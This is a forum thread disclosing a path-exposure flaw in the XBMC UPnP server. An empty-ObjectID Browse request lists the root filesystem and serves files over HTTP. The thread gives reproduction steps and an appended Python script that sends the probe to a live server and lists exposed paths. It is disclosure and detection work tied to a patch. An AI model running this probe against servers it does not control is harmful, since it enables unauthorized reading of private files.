There is a serious security hole in the XBMC UPnP server (confirmed on 11.0, 12 and latest git, Win/Mac). It is possible to get access to files outside of the media library. If a UPnP client issues a "Browse" (BrowseDirectChildren) action request with an empty ObjectID (""), the XBMC server basically returns the root filesystem listing. Folders and files from the listing are cached for HTTP access on the server side and direct links are returned in the DIDL response. Due to this, it becomes possible to browse all subfolders starting from the root "/" and have HTTP access to any individual file.
In conclusion, because of this issue, a potential adversary can get access to any file on the machine via the UPnP server of XBMC.
I just created a pull request on GitHub. See the link to the patch: https://github.com/pamiro/xbmc/commit/70...1b9bcea33c
[PATCH] Serious Security Issue with UPnPServer.cpp
Joined: Feb 2013
2013-02-01 15:00 Post: #1
(This post was last modified: 2013-02-01 15:34 by Pavel Mironchyk.)
2013-02-01 16:58 Post: #2
How to reproduce the issue using the Cling UPnP Workbench client.
1. Install XBMC. Start it and make sure that "Share video and music libraries through UPnP" is enabled.
2. Get Cling Workbench http://4thline.org/projects/cling/workbench/
This is just a nice application to invoke UPnP actions manually.
3. In Cling Workbench locate the XBMC server, select "ContentDirectory->Browse", and click on the "Invoke Action" button.
4. Use the following parameters for InvokeAction:
ObjectID: << NULL >>
SortCriteria: << NULL >>
Then click on Invoke.
5. Check the DIDL result
Below is what I am getting on my Mac:
<container id="/Volumes/" parentID="" restricted="1" searchable="1">
<item id="/mach_kernel" parentID="" restricted="1">
If I open the link http://192.168.0.106:61337/%2525/10C0284...ach_kernel
I get the kernel of my OS. And I can invoke Browse on other containers like /Volumes/.
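The same Browse request the posts above describe, scripted so it can be repeated against any ContentDirectory endpoint. This is an added example, not code from the forum posts, from XBMC or from the linked patch: it builds the SOAP Browse action with an empty ObjectID, unwraps the DIDL-Lite document from the response and flags every object whose id is a raw filesystem path (the symptom reported above). The control URL is an assumption that you obtain from the device description; the embedded sample response is constructed from the DIDL fragment in post #2, and its <res> URL is a placeholder, not the real cached link.

```python
import re
import sys
import urllib.request
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

CDS_TYPE = "urn:schemas-upnp-org:service:ContentDirectory:1"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
DIDL_NS = "urn:schemas-upnp-org:metadata-1-0/DIDL-Lite/"
DC_NS = "http://purl.org/dc/elements/1.1/"

# Object ids that are really paths: Unix absolute, Windows drive, or UNC.
PATH_LIKE = re.compile(r"^(/|[A-Za-z]:[\\/]|\\\\)")


def build_browse_request(object_id, browse_flag="BrowseDirectChildren"):
    """Return (headers, body) for a ContentDirectory::Browse SOAP call.

    The UPnP spec names the root container "0"; an id the server does not know
    should produce error 701 (No such object). object_id="" is the probe from
    the report: a listing back instead of an error is the bug.
    """
    body = (
        '<?xml version="1.0" encoding="utf-8"?>'
        f'<s:Envelope xmlns:s="{SOAP_NS}" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
        f'<u:Browse xmlns:u="{CDS_TYPE}">'
        f"<ObjectID>{escape(object_id)}</ObjectID>"
        f"<BrowseFlag>{browse_flag}</BrowseFlag>"
        "<Filter>*</Filter><StartingIndex>0</StartingIndex>"
        "<RequestedCount>0</RequestedCount><SortCriteria></SortCriteria>"
        "</u:Browse></s:Body></s:Envelope>"
    )
    headers = {
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPACTION": f'"{CDS_TYPE}#Browse"',
    }
    return headers, body.encode("utf-8")


def extract_didl(soap_response):
    """Return the DIDL-Lite document that travels XML-escaped inside <Result>."""
    envelope = ET.fromstring(soap_response)
    result = envelope.find(f".//{{{CDS_TYPE}}}BrowseResponse/Result")
    if result is None or not result.text:
        raise ValueError("no BrowseResponse/Result in SOAP reply")
    return result.text  # ElementTree already unescaped the nested XML


def filesystem_entries(didl_xml):
    """List (id, title, resource URL) of every object whose id is a filesystem path."""
    hits = []
    for obj in ET.fromstring(didl_xml):  # children are <container>/<item>
        oid = obj.get("id", "")
        if PATH_LIKE.match(oid):
            title = obj.findtext(f"{{{DC_NS}}}title", "")
            res = obj.findtext(f"{{{DIDL_NS}}}res", "")
            hits.append((oid, title, res))
    return hits


def browse(control_url, object_id="", timeout=5):
    """Probe a live server (network; the control URL comes from its device description)."""
    headers, body = build_browse_request(object_id)
    req = urllib.request.Request(control_url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return filesystem_entries(extract_didl(resp.read()))


# Constructed sample modelled on the DIDL fragment in the post. The <res> URL is a
# placeholder; a legitimate library container ("1") is included for contrast.
SAMPLE_DIDL = (
    f'<DIDL-Lite xmlns="{DIDL_NS}" xmlns:dc="{DC_NS}" '
    'xmlns:upnp="urn:schemas-upnp-org:metadata-1-0/upnp/">'
    '<container id="/Volumes/" parentID="" restricted="1" searchable="1">'
    "<dc:title>Volumes</dc:title><upnp:class>object.container</upnp:class></container>"
    '<item id="/mach_kernel" parentID="" restricted="1"><dc:title>mach_kernel</dc:title>'
    "<upnp:class>object.item</upnp:class>"
    '<res protocolInfo="http-get:*:*:*">http://192.168.0.106:61337/PLACEHOLDER/mach_kernel</res>'
    '</item><container id="1" parentID="0" restricted="1"><dc:title>Music</dc:title>'
    "<upnp:class>object.container</upnp:class></container></DIDL-Lite>"
)
SAMPLE_RESPONSE = (
    f'<s:Envelope xmlns:s="{SOAP_NS}"><s:Body><u:BrowseResponse xmlns:u="{CDS_TYPE}">'
    f"<Result>{escape(SAMPLE_DIDL)}</Result><NumberReturned>3</NumberReturned>"
    "<TotalMatches>3</TotalMatches><UpdateID>1</UpdateID>"
    "</u:BrowseResponse></s:Body></s:Envelope>"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        entries = browse(sys.argv[1])          # e.g. http://host:port/ContentDirectory/control
    else:
        entries = filesystem_entries(extract_didl(SAMPLE_RESPONSE))
    for oid, title, res in entries:
        print(f"{oid!r:20} {title!r:14} {res}")
```

Run with no arguments to see the detector flag `/Volumes/` and `/mach_kernel` while leaving the ordinary container `1` alone; run with a control URL to repeat the probe against a real server. A server that has the fix should answer the empty-ObjectID request with a UPnP error rather than a listing, so an empty hit list is the expected result after patching.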